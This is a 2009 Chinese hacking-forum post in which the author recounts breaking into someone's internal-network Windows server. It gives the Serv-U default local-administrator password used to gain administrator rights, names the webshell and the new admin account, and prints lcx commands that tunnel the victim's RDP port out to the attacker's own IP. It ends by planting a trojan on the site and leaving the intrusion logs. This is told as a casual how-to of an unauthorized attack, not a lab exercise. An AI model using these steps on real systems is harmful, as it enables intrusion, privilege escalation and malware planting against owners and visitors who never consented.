设为首页收藏本站

新微赢技术网

 找回密码
 注册
搜索
热搜: 回贴
查看: 10016|回复: 2
打印 上一主题 下一主题

再次入侵内网服务器

[复制链接]
跳转到指定楼层
1#
发表于 2009-11-29 03:02:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
图:再次入侵内网服务器
---------------------------------------------------------------------------
搞了个php的webshell,然后就想提权试试...
这次入侵没有技术可言..就当复习好了......
服务器是NT的装了apache,好像这个51shell加密后的phpspy也有权限了
到它系统目录下面找到了my.ini.装了MYSQL的.然后用户是root密码是空.
然后用php马的执行SQL功能连接它数据库试试,结果失败了.
然后用这个php马自带的扫描工具扫描了一下.发下3306没开但是..
开了21.和43958.ftp上去发现是低版本的...然后..
这个phpspy已经有Serv-U EXP了....当然不用我上传ftp.exe了..
提权就不用说了...就是利用Serv-U的本地用户localadministrator和
它的默认密码#l@$ak#.lk;0@P然后就有administrator权限了....
直接建立了用户230 login in.成功了..但是3389连不上....
webshell里面ipconfig才发现它是内网服务器.......笨得我...............
然后呢..当然是lcx大哥的lcx.exe了........哈哈.......端口重定向............
上传上去lcx -slave 我的IP 监听的端口 肉鸡IP 3389
这个命令就是把肉鸡的3389端口定向到我监听的端口..
然后本机lcx -listen 51 2105.......监听51端口..转到本级的2105端口.......
接下来就是修补漏洞了...当然是用UE改serv-u的本地默认密码了...
用webshell上传失败....工具2MB...然后用肉鸡上天空下载3kb/s
无奈了.....然后tftp又是错误Timeout occurred
最后还是本地用20cn的ftp服务器...给肉鸡下载......
完了...就用UE..打开Servudaemon.exe..找#l@$ak#.lk;0@P给它改了..
郁闷的是..改了不能覆盖掉..可能..webshell里面的SERVU EXP还在调用它..
然后就挂马咯........日志就不清理了..因为清理不掉我登陆的那个事件...
2#
发表于 2010-1-22 15:05:03 | 只看该作者
虎躯一震,三分走人
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

申请友链|小黑屋|最新主题|手机版|新微赢技术网 ( 苏ICP备08020429号 )  

GMT+8, 2024-11-18 18:49 , Processed in 0.191569 second(s), 8 queries , Gzip On, Memcache On.

Powered by xuexi

© 2001-2013 HaiAn.Com.Cn Inc. 寰耽

快速回复 返回顶部 返回列表